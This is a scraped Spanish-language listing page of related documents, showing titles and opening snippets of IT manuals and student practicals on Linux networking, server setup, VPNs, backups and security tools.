Utfsm jmc. SO Linux. Redes. Miguel Varas Utfsm jmc SO Linux Redes Miguel Varas Parte final del curso Servicios Internet [1] Minirepaso linux básico y redes [2] DNS [3] Servidor web [4] Servidor de correo [5] Administración de cortafuegos [6]

Más detalles

Linux Open Suse 10.2 (Básico + Avanzado)

Linux Open Suse 10.2 (Básico + Avanzado) Linux Open Suse 10.2 (Básico + Avanzado) Módulo: Linux básico Estudia los entornos de usuario KDE y GNOME, prestando especial atención al primero. Estudia cómo explorar el sistema de archivos, personalizar

Más detalles

UNIVERSIDAD DE ALCALÁ - DEPARTAMENTO DE AUTOMÁTICA Área de Ingeniería Telemática LABORATORIO DE COMUNICACIÓN DE DATOS (CURSO 2011/2012)

UNIVERSIDAD DE ALCALÁ - DEPARTAMENTO DE AUTOMÁTICA Área de Ingeniería Telemática LABORATORIO DE COMUNICACIÓN DE DATOS (CURSO 2011/2012) UNIVERSIDAD DE ALCALÁ - DEPARTAMENTO DE AUTOMÁTICA Área de Ingeniería Telemática it LABORATORIO DE COMUNICACIÓN DE DATOS (CURSO 2011/2012) PRÁCTICA 5 EMULACIÓN DE REDES. CONFIGURACIÓN DE ROUTERS Objetivos

Más detalles

CONFIGURACIÓN DEL SERVIDOR

CONFIGURACIÓN DEL SERVIDOR CONFIGURACIÓN DEL SERVIDOR Una vez finalizadas las configuraciones iniciales de las interfaces y direcciones IPs, desde cualquier equipo de la red abrimos el navegador e introducimos la dirección IP del

Más detalles

MANUAL COPIAS DE SEGURIDAD

MANUAL COPIAS DE SEGURIDAD MANUAL COPIAS DE SEGURIDAD Índice de contenido Ventajas del nuevo sistema de copia de seguridad...2 Actualización de la configuración...2 Pantalla de configuración...3 Configuración de las rutas...4 Carpeta

Más detalles

Instalación de dos Sistemas Operativos en un mismo Computador

Instalación de dos Sistemas Operativos en un mismo Computador Instalación de dos Sistemas Operativos en un mismo Computador Si quieres tener los dos sistemas operativos en un mismo equipo y elegir, entre uno y otro, en el momento del arranque, debes realizar los

Más detalles

GUÍA PARA LA INSTALACIÓN DE MOODLE EN UN COMPUTADOR PERSONAL QUE USA EL SISTEMA OPERATIVO MS. WINDOWS

GUÍA PARA LA INSTALACIÓN DE MOODLE EN UN COMPUTADOR PERSONAL QUE USA EL SISTEMA OPERATIVO MS. WINDOWS GUÍA PARA LA INSTALACIÓN DE MOODLE EN UN COMPUTADOR PERSONAL QUE USA EL SISTEMA OPERATIVO MS. WINDOWS Objetivo: El propósito de esta guía es indicarle como configurar un entorno moodle de prácticas en

Más detalles

Módulos: Módulo 1. Hardware & Arquitectura de sistemas - 20 Horas

Módulos: Módulo 1. Hardware & Arquitectura de sistemas - 20 Horas Módulos: Módulo 1 Hardware & Arquitectura de sistemas - 20 Horas Este módulo permite conocer y configurar los elementos básicos del hardware del sistema, como también otros componentes adicionales como

Más detalles

Instalación de Elastix

Instalación de Elastix Instalación de Elastix Manual para la versión 1.3.2 PaloSanto Solutions Junio 2009 2009, PALOSANTO SOLUTIONS todos los derechos reservados. Esta documentación es confidencial y su propiedad intelectual

Más detalles

Guía de instalación del sistema contafiscal nuevo monousuario internet

Guía de instalación del sistema contafiscal nuevo monousuario internet Guía de instalación del sistema contafiscal nuevo monousuario internet Requerimientos del equipo Requisitos de equipo (Hardware) Sistema mono usuario. Pentium IV o superior a 1.50 GHz o similar. 2 GB en

Más detalles

Acá vamos a ocuparnos de cómo realizar la instalación de una red intra-aula sobre Linux, concretamente en la distribución de GNU/Linux Ubuntu 9.04.

Acá vamos a ocuparnos de cómo realizar la instalación de una red intra-aula sobre Linux, concretamente en la distribución de GNU/Linux Ubuntu 9.04. Instalación de una red intra-aula sobre Linux (Ubuntu 9.04) Introducción La idea y la fundamentación de la creación de redes intra-aula, se puede encontrar en el siguiente enlace: http://www.fedaro.info/2009/06/29/redes-intra-aula/

Más detalles

TUTORIAL: Cómo hacer más segura nuestra red MAC OS X

TUTORIAL: Cómo hacer más segura nuestra red MAC OS X TUTORIAL: Cómo hacer más segura nuestra red MAC OS X TABLA DE CONTENIDOS INTRODUCCIÓN 3 CAMBIAR CONTRASEÑA 4 FILTRAR EL ACCESO POR MAC 5 CIFRADO WEP O WPA 6 DESACTIVAR EL BROADCASTING SSID 6 DESACTIVAR

Más detalles

UNIDAD DIDACTICA 13 INICIAR SESIÓN EN LINUX DE FORMA REMOTA

UNIDAD DIDACTICA 13 INICIAR SESIÓN EN LINUX DE FORMA REMOTA UNIDAD DIDACTICA 13 INICIAR SESIÓN EN LINUX DE FORMA REMOTA Eduard Lara 1 1. INICIO SESIÓN EN LINUX Inicio en modo local Se enciende el equipo y se introduce el nombre de usuario local y su contraseña,

Más detalles

PANDA USB VACCINE QUÉ ES? PRO CESO DE INSTALACIÓN. Abrir archivo le daremos a Ejecutar.

PANDA USB VACCINE QUÉ ES? PRO CESO DE INSTALACIÓN. Abrir archivo le daremos a Ejecutar. PANDA USB VACCINE Abrir archivo le daremos a Ejecutar. QUÉ ES? Panda Security pone a disposición de los usuarios una herramienta para evitar la forma de infección más común en los dispositivos extraíbles

Más detalles

Samsung Drive Manager Preguntas frecuentes

Samsung Drive Manager Preguntas frecuentes Samsung Drive Manager Preguntas frecuentes Instalación P.: Mi disco duro externo Samsung está conectado, pero no sucede nada. R.: Compruebe la conexión del cable USB. Si el disco duro externo Samsung está

Más detalles

VIRTUALBOX (MAQUINA VIRTUAL)

VIRTUALBOX (MAQUINA VIRTUAL) VIRTUALBOX (MAQUINA VIRTUAL) QUE ES VIRTUALBOX? Es un software de virtualización, esta aplicación es posible instalar sistemas operativos adicionales, conocidos como «sistemas invitados», dentro de otro

Más detalles

Práctica 3: Estudio de los protocolos HTTP, SMTP, POP3 e IMAP mediante un analizador de red: Wireshark

Práctica 3: Estudio de los protocolos HTTP, SMTP, POP3 e IMAP mediante un analizador de red: Wireshark FUNDAMENTOS DE REDES DE COMPUTADORES Curso 2009/2010 Práctica 3: Estudio de los protocolos HTTP, SMTP, POP3 e IMAP mediante un analizador de red: Wireshark Introducción En esta práctica vamos a trabajar

Más detalles

Tutorial DC++ Usarlo es muy sencillo y configurarlo también, aunque tiene algunos trucos importentes.

Tutorial DC++ Usarlo es muy sencillo y configurarlo también, aunque tiene algunos trucos importentes. Tutorial DC++ Para compartir, lo mejor es usar el DC++, que es un programa de intercambio P2P (como el emule) pero optimizado para usarlo en redes locales. Usarlo es muy sencillo y configurarlo también,

Más detalles

Instrucciones de instalación de IBM SPSS Modeler Server 16 para Windows

Instrucciones de instalación de IBM SPSS Modeler Server 16 para Windows Instrucciones de instalación de IBM SPSS Modeler Server 16 para Windows Contenido Instrucciones para la instalación.... 1 Requisitos del sistema........... 1 Instalación............... 1 Destino...............

Más detalles

SILLABUS CURSO : LINUX

SILLABUS CURSO : LINUX SILLABUS CURSO : LINUX Administración DURACIÓN : 8 sesiones de 3 horas cada sesión Horarios : Grupo 1 : Lunes Miércoles -Viernes (8:00 pm a 11 :00 pm) Grupo 2 : Martes Jueves ( 7:00 pm 10 :00 pm) SUMILLA

Más detalles

Acronis License Server. Guía del usuario

Acronis License Server. Guía del usuario Acronis License Server Guía del usuario TABLA DE CONTENIDO 1. INTRODUCCIÓN... 3 1.1 Generalidades... 3 1.2 Política de licencias... 3 2. SISTEMAS OPERATIVOS COMPATIBLES... 4 3. INSTALACIÓN DE ACRONIS LICENSE

Más detalles

REDES INFORMATICAS: Protocolo IP

REDES INFORMATICAS: Protocolo IP REDES INFORMATICAS: Protocolo IP 1. PRINCIPIOS BÁSICOS DE IP El protocolo IP se basa en tres principios básicos: Un direccionamiento de los ordenadores. Un tipo de dato: el datragrama IP. Un algoritmo

Más detalles

Redes de área local Aplicaciones y Servicios Linux NFS

Redes de área local Aplicaciones y Servicios Linux NFS MINISTERIO DE EDUCACIÓN Y CIENCIA SECRETARÍA GENERAL DE EDUCACIÓN Y FORMACIÓN PROFESIONAL DIRECCIÓN GENERAL DE EDUCACIÓN, FORMACIÓN PROFESIONAL E INNOVACIÓN EDUCATIVA CENTRO NACIONAL DE INFORMACIÓN Y COMUNICACIÓN

Más detalles

MF0952_2: Publicación de páginas web

MF0952_2: Publicación de páginas web MF0952_2: Publicación de páginas web TEMA 1. Características de seguridad en la publicación de páginas web TEMA 2. Herramientas de transferencia de archivos TEMA 3. Publicación de páginas web TEMA 4. Pruebas

Más detalles

Eurowin 8.0 SQL. Manual de la FIRMA DIGITALIZADA

Eurowin 8.0 SQL. Manual de la FIRMA DIGITALIZADA Eurowin 8.0 SQL Manual de la FIRMA DIGITALIZADA Documento: me_firmadigitalizada Edición: 02 Nombre: Manual de la Firma Digitalizada en Eurowin Fecha: 19-05-2011 Tabla de contenidos 1. FIRMA DIGITALIZADA

Más detalles

INSTALACIÓN DE UBUNTU SERVER 12.4 EN MÁQUINA VIRTUAL

INSTALACIÓN DE UBUNTU SERVER 12.4 EN MÁQUINA VIRTUAL INSTALACIÓN DE UBUNTU SERVER 12.4 EN MÁQUINA VIRTUAL Grupo de Innovación y Apropiación de Tecnologías de la Información Archivística Compilador: Pedro Antonio Gómez Guarín 1 INSTALACIÓN DE UBUNTU SERVER

Más detalles

Trabajo TICO Unidad 2: Sistemas Operativos. Guillermo Jarne Bueno.

Trabajo TICO Unidad 2: Sistemas Operativos. Guillermo Jarne Bueno. Un Sistema Operativo es el software encargado de ejercer el control y coordinar el uso del hardware entre diferentes programas de aplicación y los diferentes usuarios. Es un administrador de los recursos

Más detalles

Guía de instalación y configuración rápida

Guía de instalación y configuración rápida Guía de instalación y configuración rápida del servidor portable en GNU/Linux para Instituciones Educativas v1 24 de Febrero de 2015 Autores: William Alexander Ortiz Jimenez, Edwin Caldón y Ulises Hernandez

Más detalles

Instalación de FileZilla FTP Server

Instalación de FileZilla FTP Server Instalación de FileZilla FTP Server [Ir a Página principal] El proceso de instalación es muy sencillo, solamente en algunos pasos tendremos que realizar acciones como elegir el tipo de instalación o de

Más detalles

Manual de Instalación del Programa SATELITEPES

Manual de Instalación del Programa SATELITEPES Manual de Instalación del Programa SATELITEPES VERSIÓN 12.11.12 MUY IMPORTANTE!!! VERSIÓN 12.11.09 Antes de continuar con la instalación del programa confirme que su ordenador cumple con los siguientes

Más detalles

Instituto Tecnológico de Las América. Materia Sistemas operativos III. Temas. Facilitador José Doñe. Sustentante Robín Bienvenido Disla Ramirez

Instituto Tecnológico de Las América. Materia Sistemas operativos III. Temas. Facilitador José Doñe. Sustentante Robín Bienvenido Disla Ramirez Instituto Tecnológico de Las América Materia Sistemas operativos III Temas Servidor de Email Facilitador José Doñe Sustentante Robín Bienvenido Disla Ramirez Matricula 2011-2505 Grupo 1 Servidor de Email

Más detalles

Tutorial de uso. ScanIPTV V.4.7 http://scaniptv.emotec.es

Tutorial de uso. ScanIPTV V.4.7 http://scaniptv.emotec.es Tutorial de uso ScanIPTV V.4.7 http://scaniptv.emotec.es Conceptos básicos IP privada e IP pública La IP privada es una dirección virtual de una red interna, que hace referencia al dispositivo que se ha

Más detalles

Creación de imágenes. Pablo Sanz Mercado.

Creación de imágenes. Pablo Sanz Mercado. Creación de imágenes. Pablo Sanz Mercado. 1 Cuando hemos instalado un equipo, el tiempo que hemos invertido puede ser realmente elevado, pues no sólo está el tiempo de instalación del mismo, sino además

Más detalles

INSTALAR UBUNTU DESDE WINDOWS

INSTALAR UBUNTU DESDE WINDOWS INSTALAR UBUNTU DESDE WINDOWS Índice de contenido 1.Descargar Ubuntu 10.04 Lucid Lynx...3 2.Grabar la imagen descargada en un CD...3 2.1.Grabación de una imagen iso con Nero...3 2.2.Grabación de una imagen

Más detalles

Sophos Anti-Virus para Mac OS X, versión 4.9 guía de inicio. Para Macs en red con Mac OS X

Sophos Anti-Virus para Mac OS X, versión 4.9 guía de inicio. Para Macs en red con Mac OS X Sophos Anti-Virus para Mac OS X, versión 4.9 guía de inicio Para Macs en red con Mac OS X Edición: junio de 2007 Acerca de esta guía Si tiene un servidor Windows, le recomendamos que utilice Sophos Enterprise

Más detalles

Cómo unir un equipo al dominio de las aulas tecnológicas

Cómo unir un equipo al dominio de las aulas tecnológicas Cómo unir un equipo al dominio de las aulas tecnológicas Es requisito indispensable unir el equipo primero en MAX y luego en Windows, si se hace al revés Windows dará un error cuando intentemos iniciar

Más detalles

Esquema Presentación

Esquema Presentación Planificación Esquema Presentación Sesión 1 Introducción a la distibución de GNU Familiarizarse con el escritorio GNU Sesión 2 Creación de un USB con GNU Gestión de archivos y carpetas Sesión 3 Configuración

Más detalles

Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian

Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian Guía de Instalación Página 1 Índice ESCUDO MOVISTAR.... 3 1. INSTALACIÓN DEL SERVICIO ESCUDO MOVISTAR... 3 1.1. VERSIONES SOPORTADAS... 3

Más detalles

Configuracion Escritorio Remoto Windows 2003

Configuracion Escritorio Remoto Windows 2003 Configuracion Escritorio Remoto Windows 2003 Instalar y configurar servicio de Terminal Server en Windows 2003 Fecha Lunes, 25 diciembre a las 17:04:14 Tema Windows (Sistema Operativo) Os explicamos cómo

Más detalles

Vielka Mari Utate Tineo 2013-1518. Instituto Tecnológico de las Américas ITLA. Profesor José Doñé. Sistema Operativo 3 PRACTICA NO. 16, SERVIDOR EMAIL

Vielka Mari Utate Tineo 2013-1518. Instituto Tecnológico de las Américas ITLA. Profesor José Doñé. Sistema Operativo 3 PRACTICA NO. 16, SERVIDOR EMAIL PRACTICA NO. 16, SERVIDOR EMAIL -EJEMPLO REAL DE USO DEL SERVIDOR DE EMAIL Vielka Mari Utate Tineo 2013-1518 Instituto Tecnológico de las Américas ITLA Profesor José Doñé Sistema Operativo 3 Vielka Utate

Más detalles

CÓMO INSTALAR CentOS CON RAID1

CÓMO INSTALAR CentOS CON RAID1 CÓMO INSTALAR CentOS CON RAID1 INTRODUCCIÓN Antes de comenzar daremos nombre a los discos duros para poder seguir sin problemas este manual. Al primer disco duro lo nombraremos Disco A Al segundo disco

Más detalles

HOW TO SOBRE REMOTE ACCESS VPN MODE EN LINUX

HOW TO SOBRE REMOTE ACCESS VPN MODE EN LINUX HOW TO SOBRE REMOTE ACCESS VPN MODE EN LINUX 1- En este how to realizaremos una conexión remota mediante vpn; lo que haremos es comprobar primero que las maquinas que vamos a conectar, se puedan ver y

Más detalles

Apartado: Brutalix Versión: 3 Título: Monitorización redes. nmap Fecha: 15/06/07

Apartado: Brutalix Versión: 3 Título: Monitorización redes. nmap Fecha: 15/06/07 *PRÓPOSITO. Conocer como monitorizar una red con el programa Nmap. *CONDICIONES INICIALES. Ordenador con capacidad de arranque desde CDROM. *MATERIAL ASOCIADO. Disponer del live-cd 1 de la distribución

Más detalles

Instituto Tecnológico de Las Américas (ITLA)

Instituto Tecnológico de Las Américas (ITLA) Instituto Tecnológico de Las Américas (ITLA) Nombre: Gregori Carmona Lorenzo ID: 2011-2435 Asignatura: Sistemas Operativos III Instructor: José Doñe Tema: Practica extra: Apache Un servidor web es un programa

Más detalles

Vielka Mari Utate Tineo 2013-1518. Instituto Tecnológico de las Américas ITLA. Profesor José Doñé PRACTICA NO. 7, SAMBA COMO GRUPO DE TRABAJO

Vielka Mari Utate Tineo 2013-1518. Instituto Tecnológico de las Américas ITLA. Profesor José Doñé PRACTICA NO. 7, SAMBA COMO GRUPO DE TRABAJO Vielka Mari Utate Tineo 2013-1518 Instituto Tecnológico de las Américas ITLA Profesor José Doñé PRACTICA NO. 7, SAMBA COMO GRUPO DE TRABAJO CREAR UN HOWTO SOBRE SAMBA SAMBA PARA COMPARTIR DATOS, COMO GRUPO

Más detalles

Shell de Unix ProgPLN

Shell de Unix ProgPLN Shell de Unix ProgPLN Víctor Peinado v.peinado@filol.ucm.es 9 de octubre de 2014 Never use the graphical tool; always learn the old Unix tool. You ll be far more effective over time and your data will

Más detalles

WINDOWS 2008 5: TERMINAL SERVER

WINDOWS 2008 5: TERMINAL SERVER WINDOWS 2008 5: TERMINAL SERVER 1.- INTRODUCCION: Terminal Server proporciona una interfaz de usuario gráfica de Windows a equipos remotos a través de conexiones en una red local o a través de Internet.

Más detalles

TEMA 7: Configuraciones básicas en red.

TEMA 7: Configuraciones básicas en red. TEMA 7: Configuraciones básicas en red. Objetivos: Aprendizaje de la configuración de red cableada e inalámbrica en Ubuntu. Conocimiento de la utilización de interfaces de red inalámbricas compatibles

Más detalles

SYNCTHING. Herramienta de sincronización de datos vía LAN. Laboratorio de Sistemas Operativos y Redes. Caminos Diego; Zapatero R.

SYNCTHING. Herramienta de sincronización de datos vía LAN. Laboratorio de Sistemas Operativos y Redes. Caminos Diego; Zapatero R. Laboratorio de Sistemas Operativos y Redes SYNCTHING Profesor: José Luis Di Biase Herramienta de sincronización de datos vía LAN Caminos Diego; Zapatero R. Noel ºCuatrimestre I ndice Tabla de contenido

Más detalles

Universidad Técnica Federico Santa María Departamento de Electrónica. Proyecto Redes de Computadores Elo322 Routers, Servidor Virtual y Seguridad

Universidad Técnica Federico Santa María Departamento de Electrónica. Proyecto Redes de Computadores Elo322 Routers, Servidor Virtual y Seguridad Universidad Técnica Federico Santa María Departamento de Electrónica Proyecto Redes de Computadores Elo322 Routers, Servidor Virtual y Seguridad Integrantes: Edson Contreras C. Luis Marcel Barraza M. Fecha:

Más detalles

Backharddi. 1.1. Introducción. 1.2. Cómo obtener Backharddi? MAX 3.1: Madrid_LinuX Manual de Utilización

Backharddi. 1.1. Introducción. 1.2. Cómo obtener Backharddi? MAX 3.1: Madrid_LinuX Manual de Utilización Backharddi Nota: Este manual solamente cubre la creación de imágenes en dispositivos locales, discos duros tanto internos como conectados a un puerto usb. Posteriormente se completará con la posibilidad

Más detalles

Direcciones IP IMPLANTACIÓN DE SISTEMAS OPERATIVOS 1º ASIR. En redes IPv4.

Direcciones IP IMPLANTACIÓN DE SISTEMAS OPERATIVOS 1º ASIR. En redes IPv4. Direcciones IP En redes IPv4. IMPLANTACIÓN DE SISTEMAS OPERATIVOS Cada ordenador en Internet dispone de una dirección IP única de 32 bits. Estos 32 bits,o 4 bytes, se representan normalmente como se muestra

Más detalles

Administración de la producción. Sesión 2: Sistema Operativo (Microsoft Windows XP)

Administración de la producción. Sesión 2: Sistema Operativo (Microsoft Windows XP) Administración de la producción Sesión 2: Sistema Operativo (Microsoft Windows XP) Contextualización El sistema operativo es el programa principal de la computadora que controla los procesos informáticos

Más detalles

Los requerimientos básicos necesarios para poder navegar dentro del Curso Open Office Writer con Accesibilidad se dividen en:

Los requerimientos básicos necesarios para poder navegar dentro del Curso Open Office Writer con Accesibilidad se dividen en: Capítulo 1 1 Pre Requisitos Los requerimientos básicos necesarios para poder navegar dentro del Curso Open Office Writer con Accesibilidad se dividen en: 1.1 Requerimientos Tecnológicos 1.1.1 Requerimientos

Más detalles

Crear servidor NFS en Debian

Crear servidor NFS en Debian Rocío Alt. Abreu Ortiz 2009-3393 Crear servidor NFS en Debian NFS (Network File System) Sistema de archivos de red que permite a los hosts remotos montar sistemas de archivos sobre la red e interactuar

Más detalles

Descubre gnulinex 1. Capítulo 20. Instalación de gnulinex

Descubre gnulinex 1. Capítulo 20. Instalación de gnulinex Descubre gnulinex 1 Capítulo 20 Instalación de gnulinex 2 Descubre gnulinex Sistemas operativos Generalmente, cuando adquirimos un ordenador, éste nos viene con un sistema operativo instalado. El problema

Más detalles

TRUECRYPT. TrueCrypt se distribuye gratuitamente y su código fuente está disponible, aunque bajo una licencia restrictiva.

TRUECRYPT. TrueCrypt se distribuye gratuitamente y su código fuente está disponible, aunque bajo una licencia restrictiva. TRUECRYPT TrueCrypt es una aplicación para cifrar y ocultar datos que el usuario considere reservados empleando para ello diferentes algoritmos de cifrado como AES, SERPENT o Twofish o una combinación

Más detalles

FREEDOS 1.0. CURSO DE TÉCNICO EN SEGURIDAD DE REDES Y SISTEMAS José María Torres Corral

FREEDOS 1.0. CURSO DE TÉCNICO EN SEGURIDAD DE REDES Y SISTEMAS José María Torres Corral FREEDOS 1.0. CURSO DE TÉCNICO EN SEGURIDAD DE REDES Y SISTEMAS José María Torres Corral 2011 m a r t e s, 0 8 d e m a r z o d e 2 0 1 1 1 Tabla de contenido 2... Requisitos para la instalación... 2 3...

Más detalles

Correo Electrónico: Webmail: Horde 3.1.1

Correo Electrónico: Webmail: Horde 3.1.1 CONTENIDOS: PAGINA Qué es Webmail?. 2 Acceder a Webmail. 2 Instilación del Certificado UCO. 4 Instilación Certificado I.explorer. 4 Instilación Certificado Firefox. 7 Opciones Webmail. 8 Opciones Información

Más detalles

Race Manager by Master Timing Guía del usuario GUIA RACE MANAGER. Eventronic, SL

Race Manager by Master Timing Guía del usuario GUIA RACE MANAGER. Eventronic, SL GUIA RACE MANAGER Eventronic, SL DESCRIPCIÓN DEL PROGRAMA El Race Manager es un programa que se creó para facilitar el trabajo de la dirección de carrera de un evento durante y después de una carrera.

Más detalles